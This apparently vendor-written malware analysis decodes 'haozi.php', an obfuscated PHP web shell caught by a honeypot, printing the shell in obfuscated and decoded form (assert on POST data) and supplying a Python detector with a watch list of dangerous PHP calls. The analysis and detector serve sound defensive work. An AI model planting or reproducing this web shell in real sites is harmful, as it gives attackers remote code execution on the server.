haozi.php

Our honeypot has caught another new piece of malware, which is very simple but clever. At first glance it looks like nothing, because the code is padded with many PHP-style comments.

haozi.php

@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);

If we remove the comments, the code looks like this:

@$_="s"."s"."e"."r";@$_="a".$_."t";@$_(${"_P"."OS"."T"}[0]);

Finally, if we make this more readable, it is an assert() call on POST data:

@$_="a"."s"."s"."e"."r"."t";@$_(${"_P"."OS"."T"}[0]);

Final Decoded haozi.php

@assert(${"_POST"}[0]);

The POST payload is evaluated as PHP code by the assert() function.
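The manual decoding steps above (strip comments, join the string pieces, resolve the variable that holds the function name) can be automated for file scanning. The following is an added example, not Malware Expert's signature code; the function names and the DANGEROUS watch list are assumptions, and the sample is the one-liner from this page.

```python
import re

# Constructed sample: the obfuscated one-liner from haozi.php as shown on this page.
SAMPLE = ('@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";'
          '@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);')

# Assumed watch list of callables that run attacker-supplied code or commands.
DANGEROUS = {"assert", "create_function", "system", "exec", "passthru", "shell_exec"}
LITERAL = r'"([^"\\]*)"'

def strip_comments(src):
    # PHP block comments do not nest, so "/*-/*-*/" is a single comment.
    # Simplification: comment markers inside string literals are not protected.
    return re.sub(r"/\*.*?\*/", "", src, flags=re.S)

def fold_strings(src):
    # Merge "a"."b" into "ab" until no adjacent literals are left.
    pat = re.compile(LITERAL + r"\s*\.\s*" + LITERAL)
    while True:
        src, n = pat.subn(lambda m: '"%s%s"' % m.groups(), src)
        if n == 0:
            return src

def analyze(src):
    """Return (function, argument) pairs for resolved dangerous dynamic calls."""
    env, findings = {}, []
    code = fold_strings(strip_comments(src))
    for stmt in code.split(";"):          # naive statement split, enough for one-liners
        stmt = stmt.strip().lstrip("@")   # "@" only suppresses errors
        assign = re.match(r"\$(\w+)\s*=\s*(.+)$", stmt, re.S)
        call = re.match(r"\$(\w+)\s*\((.*)\)$", stmt, re.S)
        if assign:
            # Substitute already-known variables, then fold again.
            rhs = re.sub(r"\$(\w+)", lambda m: '"%s"' % env[m.group(1)]
                         if m.group(1) in env else m.group(0), assign.group(2))
            lit = re.fullmatch(LITERAL, fold_strings(rhs).strip())
            if lit:
                env[assign.group(1)] = lit.group(1)
        elif call and env.get(call.group(1), "").lower() in DANGEROUS:
            # ${"_POST"} is just another spelling of $_POST.
            arg = re.sub(r'\$\{"(\w+)"\}', r"$\1", call.group(2))
            if re.search(r"\$_(POST|GET|REQUEST|COOKIE)\b", arg):
                findings.append((env[call.group(1)], arg))
    return findings

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

String evaluation by assert() was deprecated in PHP 7.2 and removed in PHP 8.0, so a hit from this check matters most on hosts still running PHP 5 or 7.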

Final words

Use Malware Expert – Signatures to detect this malware in files for FREE!

Websites that use Malware Expert – ModSecurity rules are protected against this kind of attack.